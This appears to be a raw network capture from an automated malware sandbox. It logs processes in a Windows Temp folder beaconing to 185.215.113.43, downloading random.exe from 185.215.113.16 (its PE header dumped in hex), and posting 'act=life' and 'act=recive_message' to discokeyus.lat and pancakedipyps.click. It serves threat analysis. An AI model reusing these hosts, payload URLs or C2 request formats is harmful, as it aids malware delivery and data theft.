                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273874044 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.273890018 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.274116039 CET1236INData Raw: 02 8d 5c 00 09 64 2a 01 99 66 47 d1 98 f6 5d 72 a5 eb 5f 70 40 c6 5f 00 9f 64 be db 98 66 47 d0 98 f6 5d 72 d9 eb 5f 70 40 c6 5f 00 9f 64 a6 db 98 66 f1 c6 94 f6 ef 71 5d ea 5f 70 40 c5 5f 00 9f 64 a6 db 98 66 f1 8e 94 f6 ef 71 df f6 5f 70 40 c5
                                                                                                                                                                                                                                                                          Data Ascii: \d*fG]r_p@_dfG]r_p@_dfq]_p@_dfq_p@_df~q[_p@_dfhq[_p@_df,q[_p@_dfq[_p@_df2q_p@_df q_p@_dfq_p@_\vIS__
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.274132967 CET1236INData Raw: 30 4f 6a de 98 f5 5f a8 38 f6 5f 00 99 68 57 37 9b f5 5f 01 99 f6 5f 00 99 76 5f 51 38 f5 6a b3 97 f5 5f 00 99 f6 5f 80 98 45 3f e7 93 9b 62 dd 98 f6 5f 00 99 76 5f 51 38 47 6a cb 97 e8 5f 00 99 f6 5f 80 98 45 3f 58 9f 9e 62 d7 98 f6 5f 00 99 76
                                                                                                                                                                                                                                                                          Data Ascii: 0Oj_8_hW7__v_Q8j__E?b_v_Q8Gj__E?Xb_v_Q8j__E?<b_v_Q8___E?mxb_v_Q8g_x8_E_dbn?_Q&_r_ 8_E_dbzB_QZjr_@3_E_XbA_Qe_<2_E_db
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.393366098 CET1236INData Raw: 98 b9 5f 6d 94 f5 5f 00 98 bf 5f bd a0 f5 5f dc 18 f6 5f 01 99 f6 5f 00 99 f6 5f 00 99 f6 5f 00 99 d0 67 00 99 ea 5f 00 99 f6 5f 00 99 f6 5f 00 99 76 5f b2 94 f6 5f 00 99 ea 5f 00 99 f6 5f 00 99 f6 5f 00 99 76 5f f6 9f f6 5f 00 99 e9 5f dc 98 e8
                                                                                                                                                                                                                                                                          Data Ascii: _m_______g___v_____v__________|xE_ngFvE_[g5fuz__z"T*`z"R%S[TR{"TaT
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:37.818784952 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:38.260283947 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2918912
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:16:13 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fabd-2c8a00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 c0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4f 00 00 04 00 00 b5 c9 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(O@O,@M$a$$ $h@.rsrc$x@.idata $z@ndsdenmy*$*|@hxkdstdhOb,@.taggant0O"h,@


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          44192.168.2.550231185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:33.395771027 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:34.750657082 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:34 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          45192.168.2.550234185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:36.379709959 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:37.753379107 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          46192.168.2.550248185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:39.759526968 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:41.173530102 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:40 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          47192.168.2.550272185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:42.860155106 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 156
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:44.204679966 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          0192.168.2.549890172.67.197.1704435364C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:37 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:14:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                                          2024-12-21 00:14:38 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=ddbfeecn5k3k0o5q6dar8vt0ul; expires=Tue, 15 Apr 2025 18:01:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CM2L1YJwLcEuTBqbZ3HTOjxnaAPrkPr2KA0IYSCTeCG3VpRZfDv4KeZ28Krqodw48IjPuKyFUOqTceYWd3%2BS4j524faXS8D%2B7A2f7CH4JwsnGJY87AVKbHuWKd8DGgTyuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ac4dd8444313-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1683&rtt_var=634&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1720683&cwnd=252&unsent_bytes=0&cid=b250014b96b7e7cf&ts=975&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:14:38 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                                          2024-12-21 00:14:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          1192.168.2.549911104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:46 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:14:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                                          2024-12-21 00:14:46 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:46 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=8m0685jdbeme4iffrqa05iu2n2; expires=Tue, 15 Apr 2025 18:01:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8YEcWwC5lChQRbpLK%2BVijPMApEqM0mXZydN9gACem%2BftR7QDvQxKspXAAfryWYmiF%2F4%2FcqYdgnuhKxQ1GI6V44RxkOkGxfqW3YGtqSnLhMcE8sUzbht9yddxpICxuAXgI9tvzX4K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ac833b148cad-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2065&min_rtt=2043&rtt_var=782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1429270&cwnd=246&unsent_bytes=0&cid=582604fab5a83453&ts=763&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:14:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                                          2024-12-21 00:14:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          2192.168.2.549917104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:14:47 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 46
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:14:47 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:14:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=r5umfbgvjtmiprgqjbm8sh0lnh; expires=Tue, 15 Apr 2025 18:01:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hf0uCyjtOBBRKRt5RyuWB4im0sFjaPswf%2FQ3BAQ86XCBJDdP8Ba%2BaRTsUX%2FEq7guHDU27Sz2L5rU26Ln84ISuKnXkRFDbzOY818rOLFSbDoHTgRC6Dtauz8MpuRvrPPqVe0%2FUwDU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ac8f9f0243b9-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1677&rtt_var=647&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1666666&cwnd=192&unsent_bytes=0&cid=2453a7f3b1910d7c&ts=791&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC242INData Raw: 63 35 36 0d 0a 61 59 6b 69 77 33 50 2f 6e 4a 73 58 53 59 32 62 6e 33 4c 36 58 4e 45 48 37 73 48 44 77 7a 43 4d 77 70 50 4c 34 30 76 54 70 66 77 53 71 31 54 68 53 63 75 77 75 57 51 73 72 36 48 72 41 49 38 35 2f 53 57 50 70 65 48 35 56 75 32 75 34 4b 37 50 61 61 58 49 33 6c 50 76 51 36 38 41 6d 72 43 35 63 6a 47 76 6f 63 51 4a 32 44 6d 2f 4a 64 54 6a 70 71 6c 53 37 61 37 78 71 6f 67 6b 6f 38 6d 66 41 65 56 46 71 78 61 63 2b 50 70 37 4a 4f 6a 2b 2b 68 4f 51 4d 72 68 71 68 71 7a 68 37 78 4c 70 75 4c 48 78 77 51 61 32 30 5a 30 6b 36 46 47 6f 55 59 4b 77 34 44 55 73 34 37 6d 6c 55 4a 73 35 73 32 75 49 70 61 69 72 57 4f 53 6d 38 4b 2b 4a 4f 37 72 44 6c 41 48 72 52 71 6f 63 6c 65 7a 33 63 53 50 6a 2b 50 41 54 32 48 44 7a 59
                                                                                                                                                                                                                                                                          Data Ascii: c56aYkiw3P/nJsXSY2bn3L6XNEH7sHDwzCMwpPL40vTpfwSq1ThScuwuWQsr6HrAI85/SWPpeH5Vu2u4K7PaaXI3lPvQ68AmrC5cjGvocQJ2Dm/JdTjpqlS7a7xqogko8mfAeVFqxac+Pp7JOj++hOQMrhqhqzh7xLpuLHxwQa20Z0k6FGoUYKw4DUs47mlUJs5s2uIpairWOSm8K+JO7rDlAHrRqoclez3cSPj+PAT2HDzY
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 70 54 6a 2b 65 45 42 33 4b 50 67 75 4a 51 6b 6f 63 48 65 46 4b 56 5a 34 52 61 52 76 71 45 31 49 2b 50 33 2b 42 4f 58 4f 62 4a 6c 6e 71 79 68 6f 6c 72 6d 70 50 75 6d 6a 69 61 2f 7a 5a 6b 44 34 6b 65 75 46 70 58 34 39 6e 5a 72 6f 62 6e 36 43 4e 68 6d 38 30 57 63 6f 4b 4b 31 58 2f 2f 67 37 75 65 59 61 62 62 4c 33 6c 4f 72 52 71 38 51 6b 50 37 72 66 53 44 6b 2f 4f 38 62 6b 54 4f 2b 5a 59 47 70 72 71 4a 53 36 61 72 37 70 6f 73 74 76 4d 71 59 43 2b 73 41 37 31 47 61 35 72 6b 74 61 38 7a 38 37 52 65 55 4b 50 46 66 7a 4c 7a 76 75 42 4c 70 72 4c 48 78 77 53 47 30 78 4a 30 41 35 45 4f 70 47 6f 2f 2b 36 33 4d 6d 36 75 76 37 46 5a 59 30 73 48 65 47 72 61 65 69 57 2b 57 70 39 4b 36 46 61 66 2b 48 6d 52 4f 72 47 4f 45 77 6b 50 58 31 66 7a 7a 76 75 65 4a 65 67 58 36 30
                                                                                                                                                                                                                                                                          Data Ascii: pTj+eEB3KPguJQkocHeFKVZ4RaRvqE1I+P3+BOXObJlnqyholrmpPumjia/zZkD4keuFpX49nZrobn6CNhm80WcoKK1X//g7ueYabbL3lOrRq8QkP7rfSDk/O8bkTO+ZYGprqJS6ar7postvMqYC+sA71Ga5rkta8z87ReUKPFfzLzvuBLprLHxwSG0xJ0A5EOpGo/+63Mm6uv7FZY0sHeGraeiW+Wp9K6Faf+HmROrGOEwkPX1fzzvueJegX60
                                                                                                                                                                                                                                                                          2024-12-21 00:14:48 UTC1369INData Raw: 65 75 58 2b 4c 67 76 2b 6d 47 4d 66 47 66 33 69 48 6f 56 4b 49 62 33 38 76 36 65 79 58 6f 37 37 30 50 31 69 66 7a 59 6f 44 6a 2b 65 46 66 37 36 6a 33 75 34 34 6b 73 73 6d 51 42 4f 35 50 71 52 47 64 38 2f 78 78 49 4f 54 36 38 42 53 4b 4e 4c 4e 74 69 61 4b 72 71 78 4b 67 34 50 61 78 77 58 48 78 39 6f 6b 41 71 58 57 69 48 35 50 35 37 7a 55 30 6f 65 43 39 46 35 52 2b 36 79 57 42 71 36 53 6b 58 65 2b 71 2f 36 79 4c 4a 62 6e 4a 6e 52 6e 6b 52 4b 45 64 6c 66 54 30 65 79 2f 6e 38 50 59 62 6e 6a 36 79 62 38 7a 74 34 61 5a 4b 72 76 69 78 6e 59 59 6c 76 4d 6a 63 50 75 68 4f 72 78 61 4c 76 75 59 37 4d 71 2f 2b 38 56 44 41 66 72 39 73 6a 4b 69 72 70 56 4c 70 72 66 53 71 68 69 71 38 77 4a 51 46 37 45 53 74 47 4a 44 34 2b 58 49 76 36 75 76 34 47 5a 51 79 38 79 76 4d 70
                                                                                                                                                                                                                                                                          Data Ascii: euX+Lgv+mGMfGf3iHoVKIb38v6eyXo770P1ifzYoDj+eFf76j3u44kssmQBO5PqRGd8/xxIOT68BSKNLNtiaKrqxKg4PaxwXHx9okAqXWiH5P57zU0oeC9F5R+6yWBq6SkXe+q/6yLJbnJnRnkRKEdlfT0ey/n8PYbnj6yb8zt4aZKrvixnYYlvMjcPuhOrxaLvuY7Mq/+8VDAfr9sjKirpVLprfSqhiq8wJQF7EStGJD4+XIv6uv4GZQy8yvMp
